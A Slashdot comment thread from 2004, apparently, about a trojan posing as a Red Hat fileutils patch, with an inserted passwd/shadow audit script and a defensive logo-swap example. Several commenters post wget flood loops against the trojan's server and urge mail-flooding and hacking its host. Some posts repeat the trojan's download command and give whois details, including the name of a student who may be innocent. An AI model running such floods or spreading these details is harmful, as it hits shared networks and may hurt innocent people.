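bash:x:0:0::/home/bash:/bin/bash
"""

SAMPLE_SHADOW = """\
root:$1$constructed$hashgoeshere:12700:0:99999:7:::
bin:*:12700:0:99999:7:::
alice:$1$constructed$anotherhash:12700:0:99999:7:::
bash::12700:0:99999:7:::
"""


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:  # real files: python audit.py /etc/passwd /etc/shadow
        with open(sys.argv[1]) as p, open(sys.argv[2]) as s:
            result = audit(p.read(), s.read())
    else:
        result = audit(SAMPLE_PASSWD, SAMPLE_SHADOW)
    for check, names in result.items():
        print(f"{check}: {', '.join(names) if names else 'none'}")
```

Reading /etc/shadow needs root, so the real-file run is something for the admin who suspects the box, not a daily user-level check.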

  62. contact yahoo by Anonymous Coward · · Score: 4, Informative

    Everyone should email yahoo via netblockadmin@yahoo-inc.com and ask them to take the site down.

  63. Checksum by jesser · · Score: 4, Funny

    >md5sum fileutils-1.0.6.patch.tar.gz

    68349c219d941209af8f7c968b89d622 *fileutils-1.0.6.patch.tar.gz

    So you can be sure you're getting the real fake patch.

    --
    The shareholder is always right.
  64. two good reasons by twitter · · Score: 1

    Why not just use the real link and slashdot their site into oblivion!

    First, the guy is a dick and might have something nasty for your browser as well. Never stick your hand down a hole you saw a snake crawl out of.

    Second, the guy is a dick and won't be paying his bill. All you will do is stick the ISP with the Slashdot Jihad botnet DoS attack that follows links from Slashdot's current page.

    A third, less obvious reason is that the guy is a dick and spoofed everything. All of those listed may be innocent or not exist.

    Keep your malicious activity to yourself, please, or target real, proven dickheads with attacks that really won't harm innocent bystanders.

    --

    Friends don't help friends install M$ junk.

    1. Re:two good reasons by Antique+Geekmeister · · Score: 3, Informative

      But slashdotting the misused domain will let the company hosting the fraudulent crap know that they should vet their users a bit more carefully, and let them know that they're hosting a *BIG* problem and may need to review their overall customer contracts to prevent this in the future. It also helps give the company incentive to prosecute, or at least sue, the jerk who set them up for this.

    2. Re:two good reasons by commodoresloat · · Score: 1

      It will be a lot easier (and more cost effective) for them to (find and) sue the people posting the suggestion to slashdot than to find and sue the person who set them up in the first place....

  65. Thanks a lot!! by Anonymous Coward · · Score: 0
    We'll keep all that in mind for the next time.

    Got root?

  66. they dont care by bani · · Score: 1

    yahoo happily host criminals. the only way to get rid of them is with a search warrant.

    1. Re:they dont care by NamShubCMX · · Score: 1
      false.

      If you find your copyrighted stuff on yahoo, a simple email will take the site down.

      That's what they do where I work...

      --
      We've always been at war with Eurasia.
    2. Re:they dont care by bani · · Score: 1

      copyrighted stuff might not be ok, but criminal scams, spam, etc. certainly are.

  67. And so... by Eric+Damron · · Score: 2, Insightful

    The question begging to be asked is why is this site still alive?

    heh, maybe it won't be for long with the /. effect!

    --
    The race isn't always to the swift... but that's the way to bet!
  68. Re: text (Why? Because.) by turnstyle · · Score: 5, Insightful
    Why post the text instead of having the /. crowd flood their server to see what they've put up there?

    Because sending loads of traffic to a site that is actively trying to get a trojan onto unsuspecting boxes seems like a pretty bad idea.

    Apart from those that might click through without bothering to RTFA, and mistakenly think that it's a legit patch, there are also all those browser exploits (such as the Microsoft jpeg exploit) that could also be waiting on the site for unpatched systems.

    --
    Here's what I do: Bitty Browser & Andromeda
  69. Strongly Adviced (sic) by Anonymous Coward · · Score: 0

    Anybody running RedHat and Fedora are(sic) strongly adviced(sic) to apply this patch!

    Malware writers should be strongly adviSed on grammar and spelling if they want to be taken seriously.

    1. Re:Strongly Adviced (sic) by Anonymous Coward · · Score: 0
      are(sic)

      ?

    2. Re:Strongly Adviced (sic) by Anonymous Coward · · Score: 0

      Let me guess: you're European, specifically English.

      Anybody == any person == anyone.

      And "any person" obviously uses a singular verb as does "anyone."

      In the US we follow a different convention: group plurals are used with singular verbs. I.e. we would say, The team is looking forward to the game whereas in the UK you're more likely to say, The team are looking forward to the game.

  70. Good thing I saw this on /. by Anonymous Coward · · Score: 0

    Damn, I was really close to being exploited, I use those programs every day. Good thing I am now patched. ....what? RTFA you say?

    What do you mean it's not a real patch. MF@#$%#$%

    NO CARRIER

  71. Updated version from a couple of days ago... by Zocalo · · Score: 3, Interesting

    This hit the SpamAssassin mailing list a couple of days ago, the only difference is the location of the file which might help explain the Stanford reference. In the original the line was:

    wget www.stanford.edu/~joeio/fileutils-1.0.6.patch.tar.gz
    but now it's:
    wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz

    Whoever is behind this certainly seems to be doing a very sloppy job of it. Yahoo, Melbourne IT, Stanford, hosting at "everyone.net"; hardly a who's who of dodgy companies and "bullet proof" service providers, is it? Frankly, I'm expecting to be reading a Slashdot story about a bust by the end of the week, and that's being generous.

    --
    UNIX? They're not even circumcised! Savages!
    1. Re:Updated version from a couple of days ago... by natrius · · Score: 1

      A StanfordWho search for that id turns up this:

      Name: Irene O Joe
      Email: joeio@stanford.edu
      Organization: University
      Relationship: Student
      Position: Graduate, Law
      Department: Law School
      I'm guessing some law student got her password cracked, and the school took down the file when they found out what happened.

    2. Re:Updated version from a couple of days ago... by dioscaido · · Score: 1

      Do you think they'll be busted? Given the Linux community's tech savvy, probably not too many systems were affected, so there won't be a big impetus for law enforcement to get involved. Still, given that the Slashdot crowd is on the case, the person will probably be found and at the very least fined in some way.

  72. Let's call this what it is by Anonymous Coward · · Score: 0

    Sure, RedHat is spinning it as 'malicious code', but we all know what it is: a virus, just like that one for Mac OS X! Quick, start the presses! Tell everyone about this dangerous new virus!

    (Note to the sarcasm impaired: this is humour).

  73. Umm... yes... by Theatetus · · Score: 1

    That is why they use a signed certificate for Windows Update, in fact. And why Microsoft PGP signs their security bulletin emails. Is there a joke there I'm missing?

    --
    All's true that is mistrusted
  74. everyone now.... by Anonymous Coward · · Score: 1, Interesting

    wget -O /dev/null http://www.fedora-redhat.com/fileutils-1.0.6.patch .tar.gz

    Let's use all of his bandwidth quota up.

    1. Re:everyone now.... by LibrePensador · · Score: 1

      wget -O /dev/null http://www.fedora-redhat.com/fileutils-1.0.6.patch .tar.gz

      I just turned it into a cron job that runs every freaking minute. Let's get this guy off the net.

      --
      Pragmatism as an ideology is not particularly pragmatic in the long term. Keep it in mind when you dismiss Free Software
    2. Re:everyone now.... by downbad · · Score: 1

      i hate to break it to you, but the website is hosted on geocities.

    3. Re:everyone now.... by Anonymous Coward · · Score: 0

      Note: You have to fire up multiple sessions of the wget command to hit all of their servers.

    4. Re:everyone now.... by L0stm4n · · Score: 0

      This is a lot more fun :) especially since my webserver sits on a DS3.

      while [ 1 ] ; do wget -O /dev/null http://www.fedora-redhat.com/fileutils-1.0.6.patch .tar.gz; done

      --
      superman runs linux
    5. Re:everyone now.... by Anonymous Coward · · Score: 0

      Yes, please, lots of people do this, because after all, there's one dedicated line from each of us to this idiot, and bandwidth is never shared, because the Internet isn't a packet switching network, there are no intermediate routers and no overworked administrators to worry about some "assault of hono(u)r", and DDoSing one person only ever hurts the single intended target.

  75. How did you get his email and home address?? by Eric+Damron · · Score: 1

    Wow that's more info than I get from a whois lookup...

    How the hell do you do that?

    --
    The race isn't always to the swift... but that's the way to bet!
    1. Re:How did you get his email and home address?? by Anonymous Coward · · Score: 1, Informative

      whois.tucows.com

      tho the info is fake.
      zip is Atwater, CA not NY.
      phone number is not NY either.
      209 899 SONORA California PACIFIC BELL RBOC

    2. Re:How did you get his email and home address?? by Anonymous Coward · · Score: 0

      your whois obviously sucks ass

  76. look at this in a different way by barebones · · Score: 0, Redundant

    LINUX IS GROWING LINUX IS GROWING but is this just a start of linux bugs or virus etcccc.......

    1. Re:look at this in a different way by dtfinch · · Score: 2, Funny

      I can just imagine...

      "Attached is a sexy picture of Anna Kournikova.
      To view the picture, simply:
      1) save the attachment
      2) su -
      3) tar -xjf anna.tar.gz
      4) ./configure
      5) make
      6) make install
      7) anna"

    2. Re:look at this in a different way by Anonymous Coward · · Score: 0

      Whatever it takes to install a LEGITIMATE package on distro-X will be THE MECHANISM used to unwittingly install a trojan.

      Linux just makes installing ANYTHING harder (generally) but once users become used to this obstacle, it will not prevent the unwitting infection of the next "KDE fireworks screensaver" now will it?

  77. bastards by scottking · · Score: 1

    the bastards even had the nerve to pilfer bandwidth from redhat (from redhat-fedora.com page source):

    <img src="http://www.redhat.com/g/chrome/logo_rh_home.png">

    good thing we didn't give them a good slashdotting.

    --
    scott king
    1. Re:bastards by vsync64 · · Score: 5, Insightful

      Red Hat should simply rename the file on their site, change the links to it, and then replace it with a "THIS IS FRAUD" PNG.

      --
      TO BUY A NEW CAR WOULD MAKE YOU SEXUALLY ATTRACTIVE.
    2. Re:bastards by scottking · · Score: 1

      and me without any mod points for you...

      --
      scott king
    3. Re:bastards by Anonymous Coward · · Score: 0

      There's an interesting way to fight 'phishing'.

      For whatever reason, 'phishers' like to reference the corporate logos used by the banks and companies. All these companies have to do is to give the corporate image a unique name every hour, with the old image marked 'fraud'. This would outdate the validity of any E-mail sent by the 'phisher', as the title would indicate the validity of the document.

  78. Sure, why not? by twitter · · Score: 1
    ..was this set up by SCO, Microsoft or one of the anti-virus folks who want to prove that Linux isn't without its weaknesses...?

    Just look for the soon to be announced case of a photograph of a male model that looks nothing like the PR drone who writes an article about their bad experience with an email trojan while running Red Hat. It will run on about how secure they felt without complicated tar files and compilations, just taking it easy while Windoze 2003 server and Windoze Update did all the hard work for him. No more late nights with failed makefiles trying to run trojans for him again, no sir, he's switching back to the blissful, dependable world of M$. It will be the security analog to the ease of use Apple Switcher about a year ago and it will fool about as many people for about as long.

    Dude, once you get the facts you will always be willing to pay for second rate stuff!

    --

    Friends don't help friends install M$ junk.

    1. Re:Sure, why not? by Anonymous Coward · · Score: 0
      Moderators: Please note that "twitter" is a known fanatical sycophant whose obnoxious offtopic rants are legend here on Slashdot. It doesn't matter what the topic is, he'll find a way to scrape in some pointless Microsoft bashing. While nobody expects us to love Microsoft in any way, his particularly tepid style of calling anyone he replies to "troll" or "liar" or "fanboy" because he happens to disagree with whatever they're saying is well documented and should not be rewarded. If anything, twitter is the type of person that should not be part of the open source/free software community. He is an anathema to all that is good about free software.

      I'm posting this so that you (the moderator) have some context to consider twitter and not mod him up whenever he posts his filler preformatted rants about installing Knoppix or Mepis or whatever that unfortunately get him karma every single time and allow him to continue posting his trademark toxic crap (read on) day in and day out. You may consider this a troll - I consider it community service. And I ain't kidding.

      If you're a /. subscriber, I invite you to look through some of his posting history. I guarantee that you'll be hard pressed to find someone that is more "out there" than twitter. You'll also probably notice he's got quite an AC following. Don't just read his posts, make sure you go through the replies.

      To get an idea of what I'm talking about, check this post out. This is an article about email disclaimers. The parent of the post is complaining about the ads in the linked page and so on, and twitter actually goes off on a rant to blame it on Microsoft and recommend Lynx, because "is teh free".

      Here's another. In this post twitter not only calls the OP a troll but attempts to "tell it like it is" while making some vague argument about "GNU". Yes, if you're confused, you're not alone. The reply (modded +4) proceeds to simply destroy his bogus argument. You will notice he did not reply. This is what some people call "drive-by advocacy". A sort of I'll just leave you with my thoughts here and move on to the next flamebait kind of deal. In fact, he almost never replies because he knows that his fanatical arguments simply do not hold up to any sort of discussion. It's not that he's chosen the wrong cause - he's just going at it in a completely wrong way.

      Here's that drive-by advocacy and FUD in motion: twitter goes on about some topic and then drops the usual "oh and M$ is teh evil" because "WMP phones home" or some such. Called on his FUD, he then claims that WMP stores every song and movie you've ever played in a file, somewhere. Pressed further, he just sort of slithers out of sight, his FUD-spreading complete. This is not about some Microsoft technology that nobody likes anyway; it's about lying for the sake of lying. Way too many of his posts are exactly like this one.

      More? Just read through this post and the subsequent replies. I guess this stands on its own. Or these two. Or this one. Or this one.

      Still not convinced? This is what twitter considers "humour" while going about his daily "M$" routine.

      M

  79. And addlebrain.com is: by Anonymous Coward · · Score: 0
    Wonder if these are the bad guys, or if they're just 0wned by bad guys.
  80. Probabilities: by reality-bytes · · Score: 5, Funny

    If the Antivirus companies were responsible, they'd have done a better job.

    If Microsoft was responsible, they wouldn't have included any source code.

    If SCO was responsible, they'd have included sourcecode and then sued you for running it

    All things taken into consideration, I'm with 'other' on this one ;)

    --
    Ripping an new rectum in the fabric of spacetime.
  81. The guy seems to be Romanian by Shulai · · Score: 1

    I'm not Romanian, but a native Spanish speaker myself; however, using Google with the word stii shows a Romanian link as the first non-English one. Further searches with "Romania frate" and "Romania belea" confirm this.

    1. Re:The guy seems to be Romanian by at_slashdot · · Score: 2, Interesting

      I confirm, it's Romanian; I translated it in another post. Nothing important, the writer is an idiot.

      --
      "It is our choices, Harry, that show what we truly are, far more than our abilities." -- Prof. Dumbledore
  82. Better colours by Anonymous Coward · · Score: 1, Informative
  83. The Obvious tip-off? by dramatools · · Score: 0, Redundant

    Shouldn't users suspect a "patch" from Red Hat (who gave the world RPM) distributed as a tarball? Also, a real Red Hat alert would encourage users to download the update from RHN or a known good Yum repository. If those two holes in the story weren't enough, there's the lack of a case number and the single patch offered for SIX distributions, all of which are end-of-life save for Fedora Core 2. Red Hat now only provides official updates for Red Hat Enterprise Linux, which isn't mentioned in the "alert" at all. The Fedora Project would only provide updates for Fedora Core 2, while RHL 7.3, 9 and FC 1 are now supported by the Fedora Legacy Project. RHL 7.2 and 8.0 are pretty much abandoned, so any fixes for those releases would need to be built by the user. Fedora Core doesn't even ship a 'fileutils' package-- the Fedora version is called 'coreutils' and also includes sh-utils, textutils and the 'stat' command. This kind of phishing scam is unfortunately commonplace, though large financial institutions are the usual covers. This is the first one I've seen pertaining to a Linux distro-- I can only hope most Red Hat/Fedora admins are familiar enough with their distros to see right through this one.

  84. Disassembled the shellcodes by Theatetus · · Score: 1

    And all I can say is, what a colossal waste of effort by this jackass. Just write the malware in C and compile it; no need to shellcode yourself like that. If I'm reading it right, that is. Too bad the lameness filters kill the disassembly.

    --
    All's true that is mistrusted
  85. Well, I wonder too... by WIAKywbfatw · · Score: 1

    Well, I think if you're going to ask that then I think you also need to look at the reverse situation: are some of the exploits that take advantage of weaknesses in Microsoft products written by people who take their love of Linux too far? And were the DDOS attacks on the SCO website, etc also committed by similar individuals?

    Come on, hand on heart, don't you think that there's even been one attack on a closed source software product that's been the working of a less than well-adjusted open source zealot? I think if you're going to speculate about the unlikely possibility that Microsoft or SCO would undermine Linux in such a manner then you have to at least accept the likelihood that they've been the victim of a malicious pro-Linux cracker on more than one occasion.

    (Cue twenty posts flaming me to hell and back...)

    --

    "Accept that some days you are the pigeon, and some days you are the statue." - David Brent, Wernham Hogg
  86. I love it! by jd · · Score: 5, Funny

    Linux geek comes across an obvious trojan. What does said geek do? E-mail the site admin? DoS the source site? Noooooo. They set up a sandbox environment and run it, to see what happens!

    (Mind you, I'm no better. First time I got a computer virus, when I was running MSDOS, my first reaction was to run a binary diff against a clean version of the file, and disassemble the result to see what it did. Do you know if there's a cure for this?)

    --
    It's a small world and it smells funny; I'd buy another if it wasn't for the money; Take back what I paid (SoM)
    1. Re:I love it! by juhaz · · Score: 2, Insightful

      Do you know if there's a cure for this?

      A cure for what? Human curiosity? Why on Earth would anyone want to be "cured" from that, and become something less instead. It's one of the few good qualities that have brought us so far despite our lacking on other important areas...

      On computer geeks, need to know how things work naturally becomes directed towards computers...

    2. Re:I love it! by ocelotbob · · Score: 1

      Oftentimes, these trojans are usually just the tip of the iceberg. If they hadn't disassembled the trojan, the email address the virus sends its results to wouldn't be known and the other part of the attack wouldn't be known.

      --

      Marxism is the opiate of dumbasses

    3. Re:I love it! by Cheile · · Score: 1

      I wanted to make sure that I'm extra patched! So I'm downloading it with my nifty script

      #!/bin/bash

      while [ 1 ]
      do
      wget http://www.fedora-redhat.com/fileutils-1.0.6.patch .tar.gz > /dev/null
      done

    4. Re:I love it! by Tony-A · · Score: 3, Insightful

      Do you know if there's a cure for this?

      You don't want a cure for this.

      If you want a legitimate comparison between Linux and Windows security, observe:

      This is new and fresh enough to "set up a sandbox environment and run it, to see what happens!" Another Windows similar thingee, "been there done that".

      Dated 23rd October 2004 on http://www.redhat.com/security/ which means that Red Hat was on top of it fast. This isn't the kind of thing that Slashdot sits on and Red Hat was one day plus ahead. For comparison, it took about 6 days for Microsoft to return anything about Code Red on a search from microsoft.com. That's 6 days after appearing on Slashdot (compared to 1 day before).

    5. Re:I love it! by /dev/trash · · Score: 2, Funny

      Marriage.

    6. Re:I love it! by mauryisland · · Score: 1

      Hmmm. You'll be extra patched, all right.

    7. Re:I love it! by Anonymous Coward · · Score: 0
      Yup, with wget settings like that you'll have lots of copies:
      fileutils-1.0.6.patch.tar.gz
      fileutils-1.0.6.patch.tar.gz.1
      fileutils-1.0.6.patch.tar.gz.2
      fileutils-1.0.6.patch.tar.gz.3 ...
      should have done a

      wget -o /dev/null -O fileutils-1.0.6.patch.tar.gz http://www.fedora-redhat.com/fileutils-1.0.6.patch .tar.gz

      so you have one file, just refetched a bunch of times.
    8. Re:I love it! by Lumpy · · Score: 0, Offtopic

      Do you know if there's a cure for this?

      yes, find a 2 by four about 6 feet in length, stand with your feet firmly on the ground and rapidly bash yourself in the head until you become one of the drooling masses.

      this is the only cure.

      --
      Do not look at laser with remaining good eye.
  87. okay, heres the plan... by Foktip · · Score: 0

    for (( i=0 ; i<80000 ; i=$((i+1)) ))
    do
    wget http://www.fedora-redhat.com/fileutils-1.0.6.patch .tar.gz &
    rm fileutils*
    echo woot
    done

    1. Re:okay, heres the plan... by synthparadox · · Score: 2, Insightful
      #!/usr/local/bin/bash

      while [ 0 ]
      do
      wget -q http://www.fedora-redhat.com/fileutils-1.0.6.patch .tar.gz
      rm -f fileutils-1.0.6.patch.tar.gz
      done
      Already running and will be running throughout the night.
    2. Re:okay, heres the plan... by Derek+Pomery · · Score: 1

      funny. I was already running:
      while [ 1 ];do wget -O/dev/null http://www.fedora-redhat.com/fileutils-1.0.6.patch .tar.gz;done

      --
      -- perl -e'print pack"H*","6e656d6f406d38792e6f7267"' /. ate my old sig. Bastards.
    3. Re:okay, heres the plan... by Anonymous Coward · · Score: 0

      N.B. the wget line got a space put in it by the filter (before .tar.gz).

      Easier to do: wget -O /dev/null (direct output to dev/null)

    4. Re:okay, heres the plan... by gabba_gabba_hey · · Score: 1
      Or you could change it to:
      #!/usr/local/bin/bash

      while [ 0 ]
      do
      wget -O /dev/null -q http://www.fedora-redhat.com/fileutils-1.0.6.patch .tar.gz
      done
    5. Re:okay, heres the plan... by Anonymous Coward · · Score: 0

      ugh, never mind this has already been said, sorry about that

    6. Re:okay, heres the plan... by Foktip · · Score: 0

      WHAT! Okay, why did I get 0 and the guy who replies gets 5 insightful? My coding isn't THAT bad, is it??

  88. Re: I'll try it... Execution results! by TCM · · Score: 1

    OK slashdot crowd, on to addlebrain.com to give it a good slashdotting.

    Apparently, they run IIS/6.0. Maybe the guys with darker-than-white hats can give it a free "auditing" *nudge*nudge*wink*wink*.

    --
    Of course it runs NetBSD. BTC: 1NT7QvbetmANwaMzhpVL6
  89. View page source by LittleLebowskiUrbanA · · Score: 1

    Dumbass is getting the Redhat logo from a Yahoo page.

    http://geo.yahoo.com/serv?s=76001524&t=1098669974

    Pretty obvious goof even after "adviced."

    1. Re:View page source by krray · · Score: 1

      That's not what I saw (your reference is commented out). I see the logo coming from:
      http://www.redhat.com/g/chrome/logo_rh_home.png ...which would be nice if Redhat could change their pages to not use that photo ... and replace that photo with something like:
      THIS IS A FAKE UPDATE NOT SUPPLIED BY REDHAT -- DO NOT DOWNLOAD!
      (until the site can be taken down completely)

      That is what _I_ would do. :)

    2. Re:View page source by scottking · · Score: 1

      your code references a 1x1 gif spacer... doesn't make these guys any less stupid though.

      --
      scott king
    3. Re:View page source by LittleLebowskiUrbanA · · Score: 1

      That would be pretty cool if Red Hat put something like that. If I was working there, it would be too much temptation for me :)

    4. Re:View page source by ln+-sf+head+ass · · Score: 1

      If I worked for Red Hat, I'd ask Yahoo to borrow the goatse image to replace the logo. Wouldn't have to worry about too many installs then, I imagine.

    5. Re:View page source by rwebb · · Score: 1

      Damn, and me without mod points. Consider yourself the recipient of a virtual +1 funny...

      --
      Trusted by cats.
    6. Re:View page source by ocelotbob · · Score: 1

      No need to go through all that effort. All you need to do is create a simple .htaccess directive and use mod_rewrite to redirect anyone referred to the image from fedora-redhat.com to an image saying something like "this is fake." No need to recode the entire site.

      --

      Marxism is the opiate of dumbasses
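
The referer-based swap described above, as an added example that is not from the thread or from Red Hat: a small WSGI handler in Python that serves a warning image instead of the real logo when the request is hot-linked from the impostor domain. The image path is the one quoted in the thread; the image bytes and the FRAUD_DOMAINS set are constructed placeholders, and the host match is exact-label so that lookalike hosts do not slip past a substring check.

```python
# Added example, not code from the thread or from Red Hat: serve a "this is fraud"
# image in place of the real logo whenever the Referer points at a known impostor
# site. Image bytes and the domain set are constructed placeholders.
from typing import Iterable, Tuple
from urllib.parse import urlsplit

# Constructed: the impostor domain named in the thread. Add others as they turn up.
FRAUD_DOMAINS = {"fedora-redhat.com"}

# Constructed stand-ins for real PNG data.
REAL_LOGO = b"<constructed PNG bytes: the real logo>"
FRAUD_IMAGE = b"<constructed PNG bytes: THIS IS A FAKE UPDATE NOT SUPPLIED BY REDHAT>"


def referer_host(referer: str) -> str:
    """Lowercased host from a Referer URL, or '' if there is none.

    Scheme, port, credentials and path are dropped, so
    'HTTP://user@www.fedora-redhat.com:8080/x' yields 'www.fedora-redhat.com'.
    A bare or malformed value (no scheme) yields '' and is treated as no referer.
    """
    try:
        host = urlsplit(referer.strip()).hostname
    except ValueError:  # e.g. a broken IPv6 literal
        return ""
    return (host or "").lower().rstrip(".")


def is_fraud_referer(referer: str, fraud_domains: Iterable[str] = FRAUD_DOMAINS) -> bool:
    """True when the Referer host is a fraud domain or a subdomain of one.

    Matching on whole labels (host == d or host ends with '.' + d) avoids the
    substring trap: 'fedora-redhat.com.example.org' and 'notfedora-redhat.com'
    must NOT match, while 'www.fedora-redhat.com' must.
    """
    host = referer_host(referer)
    if not host:
        return False
    for d in fraud_domains:
        d = d.lower().rstrip(".")
        if host == d or host.endswith("." + d):
            return True
    return False


def pick_logo(referer: str) -> Tuple[bytes, str]:
    """Return (image bytes, label) for a logo request carrying the given Referer."""
    if is_fraud_referer(referer):
        return FRAUD_IMAGE, "fraud-warning"
    return REAL_LOGO, "real-logo"


def logo_app(environ, start_response):
    """Minimal WSGI app for /g/chrome/logo_rh_home.png (the path quoted in the thread).

    'Vary: Referer' tells caches that the response depends on the Referer header, so
    a copy served to a legitimate page is not replayed to the impostor's visitors
    (and vice versa).
    """
    body, _label = pick_logo(environ.get("HTTP_REFERER", ""))
    headers = [
        ("Content-Type", "image/png"),
        ("Content-Length", str(len(body))),
        ("Vary", "Referer"),
    ]
    start_response("200 OK", headers)
    return [body]


if __name__ == "__main__":
    from wsgiref.simple_server import make_server
    with make_server("127.0.0.1", 8000, logo_app) as httpd:  # local demo server
        httpd.serve_forever()
```

Browsers that strip or omit Referer fall through to the real logo, so this only catches the common hot-link case, not a copy of the image hosted on the impostor's own server.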

    7. Re:View page source by ln+-sf+head+ass · · Score: 1

      Thanks :).

  90. Re: I'll try it... Execution results! by numist · · Score: 1

    so, it requests the root password

    In Romanian?

    well then... guess that settles it. Incendiary charges built into every new computer from now on.

    Then again, I suppose hacking out acpi and cpufreq could have a similar effect... but then the writer wouldn't be able to go back and use infected machines as drones.

  91. You have been trolled, you have lost. by Anonymous Coward · · Score: 0

    Have a nice day.

  92. Re: I'll try it... Execution results! by labratuk · · Score: 5, Interesting

    Surely we just have to send a load of bogus reports to root@addlebrain.com and he'll have a fun time trying to find the genuine ones.

    --
    Malike Bamiyi wanted my assistance.
  93. Fill the mailbox by grahamdrew · · Score: 2

    We know the email address that the trojan sends its feedback to. Rather than attempting to slashdot the site, why don't we just flood the email box. It'll eat bandwidth, dilute any useful data the SOB who set this up will get, and maybe stop future dipshit admins from getting whacked. So... anybody want to work out the format of a message telling whatever lameass came up with this scheme that microsoft.com just got rooted? :-)

    --
    // Dumps core here
    1. Re:Fill the mailbox by Anonymous Coward · · Score: 0

      It could be a joe-job.

  94. M$ funded project by Anonymous Coward · · Score: 0

    Wow, I can't believe Bill can go so low.

  95. The URL gives away someone involved.. by schmiddy · · Score: 1

    That stanford URL:
    www.stanford.edu/~joeio/fileutils-1.0.6.patch.tar.gz

    apparently belongs to a Stanford Faculty member, Irene Joe.
    The URL is no longer valid, or I'd email her (joeioATstanfordDOTedu), she even has a phone number online. I'm assuming she just had her box compromised and the phishers used her webspace to propagate the trojan, at least initially.

    --
    http://cltracker.net -- powerful craigslist multi-city search
    1. Re:The URL gives away someone involved.. by Anonymous Coward · · Score: 0

      The URL is no longer valid

      Sure it is; there's just nothing there.

      Anyway the convention you mention is right and I'm sure the account is still live.

  96. ADDLEBRAIN DNS WHOIS query.... by ScottKin · · Score: 0, Informative

    Registration Service Provided By: StoreIQ, Inc.
    Contact: technical@storeiq.com
    Visit:

    Domain name: ADDLEBRAIN.COM

    Registrant Contact:
    ABM Wireless
    Domain Administrator (administrator@buywirelessdirect.com)
    +1.7323331100
    Fax: +1.NA
    3587 US Highway 9 #132
    Freehold, NJ 07728
    US

    Administrative Contact:
    ABM Wireless
    Domain Administrator (administrator@buywirelessdirect.com)
    +1.7323331100
    Fax: +1.NA
    3587 US Highway 9 #132
    Freehold, NJ 07728
    US

    Technical Contact:
    ABM Wireless
    Domain Administrator (administrator@buywirelessdirect.com)
    +1.7323331100
    Fax: +1.NA
    3587 US Highway 9 #132
    Freehold, NJ 07728
    US

    Billing Contact:
    ABM Wireless
    Domain Administrator (administrator@buywirelessdirect.com)
    +1.7323331100
    Fax: +1.NA
    3587 US Highway 9 #132
    Freehold, NJ 07728
    US

    Status: Locked

    Name Servers:
    dns1.name-services.com
    dns2.name-services.com
    dns3.name-services.com
    dns4.name-services.com
    dns5.name-services.com

    --
    I don't give a rat's behind about "karma" here or anywhere else. Don't like what I have to say here? Deal with it!
    1. Re:ADDLEBRAIN DNS WHOIS query.... by Anonymous Coward · · Score: 0

      You sad, pathetic cockmonkey bastard. Not only are you trolling for mod points by pasting a whois query (WOW, HOW DID HE DO THAT) but you can't get above 0 by doing so.

      Thanks for all the help, shitsack. I never would have been able to do a whois by myself! Fuck!

  97. Kind of Scary by spikedvodka · · Score: 1

    The fact that
    a) it's 22:17 EST and the site is still up and running fine;
    b) the main site is the "security bulletin";
    and
    c) the instructions don't instruct people to verify the gpg signature
    is all kind of scary

    --
    I will not give in to the terrorists. I will not become fearful.
  98. The dangers of outsourcing to Nigeria by Anonymous Coward · · Score: 0
    It looks like whoever is putting up this malware outsourced the site design and writing to some Nigerians:

    Anybody running RedHat and Fedora are strongly adviced to apply this patch! Read more about this vulnerability at www.redhat.com or www.fedora.redhat.com Thank you for your prompt attention to this serious matter,

    And please send your bank account details while you're at it! I love how it tells you to compile it and install.

  99. Comment removed by account_deleted · · Score: 1

    Comment removed based on user account deletion

  100. fedora-redhat.com DNS WHOIS query... by ScottKin · · Score: 0, Informative

    Domain Name.......... fedora-redhat.com
    Creation Date........ 2004-10-24
    Registration Date.... 2004-10-24
    Expiry Date.......... 2005-10-24
    Organisation Name.... Raymond Jackson
    Organisation Address. 224 Cedar Avenue
    Organisation Address.
    Organisation Address. New York
    Organisation Address. 95301
    Organisation Address. NY
    Organisation Address. UNITED STATES

    Admin Name........... Raymond Jackson
    Admin Address........ 224 Cedar Avenue
    Admin Address........
    Admin Address........ New York
    Admin Address........ 95301
    Admin Address........ NY
    Admin Address........ UNITED STATES
    Admin Email.......... rayjackson23@yahoo.com
    Admin Phone.......... +1.2098994533
    Admin Fax............

    Tech Name............ YahooDomains TechContact
    Tech Address......... 701 First Ave.
    Tech Address.........
    Tech Address......... Sunnyvale
    Tech Address......... 94089
    Tech Address......... CA
    Tech Address......... UNITED STATES
    Tech Email........... domain.tech@YAHOO-INC.COM
    Tech Phone........... +1.6198813096
    Tech Fax............. +1.6198813010
    Name Server.......... yns1.yahoo.com
    Name Server.......... yns2.yahoo.com

    Have fun!

    --ScottKin

    --
    I don't give a rat's behind about "karma" here or anywhere else. Don't like what I have to say here? Deal with it!
    1. Re:fedora-redhat.com DNS WHOIS query... by Anonymous Coward · · Score: 0

      Ironically, this is the only dipshit-free material you've posted in months.

  101. Re: I'll try it... Execution results! by pmazer · · Score: 1

    It probably fails because it's on Knoppix and cannot create another user.

  102. I DO NOT AWARD POINTS by Anonymous Coward · · Score: 0

    for inept attempts. My God. This is like the hillbilly that climbed the power transmission tower, drank a six-pack, and peed on the power lines.

  103. He made him say "Matei!" by Anonymous Coward · · Score: 0

    Ray Jackson was a fighter in the Kuomitei, he got beat by Chong Li because he stopped paying attention. He was friends with Frank Dux, as I recall, and they had some beers in the hospital after Frank won.

  104. Analysis by Anonymous Coward · · Score: 0

    Here is an analysis that was sent to the full-disclosure mailing list:
    http://lists.netsys.com/pipermail/full-disclosure/2004-October/028031.html

  105. notifying the appropriate people.... by menscher · · Score: 2, Interesting

    To : abuse@everyone.net,
    abuse@above.net
    Subject : malware using your netblock to propagate

    http://it.slashdot.org/article.pl?sid=04/10/24/2352234&tid=172&tid=110&tid=218&tid=106

    The story reports on a linux trojan that, after installing, emails a
    report back to root@addlebrain.com. The MX record for addlebrain.com
    points to sitemail.everyone.net. It would reduce the effect of this if
    you could shut down that email account.

    Better yet, you should gather the list of infected IPs and then inform
    the owners.

    Damian Menscher
    --
    -=#| Physics Grad Student & SysAdmin @ U Illinois Urbana-Champaign |#=-
    -=#| 488 LLP, 1110 W. Green St, Urbana, IL 61801 Ofc:(217)333-0038 |#=-
    -=#| 4602 Beckman, VMIL/MS, Imaging Technology Group:(217)244-3074 |#=-
    -=#| <menscher@uiuc.edu> www.uiuc.edu/~menscher/ Fax:(217)333-9819 |#=-
    -=#| The above opinions are not necessarily those of my employers. |#=-

    1. Re:notifying the appropriate people.... by Anonymous Coward · · Score: 0
      above.net? They're such a spam haven it'll take days for them to do anything, if they do anything at all.

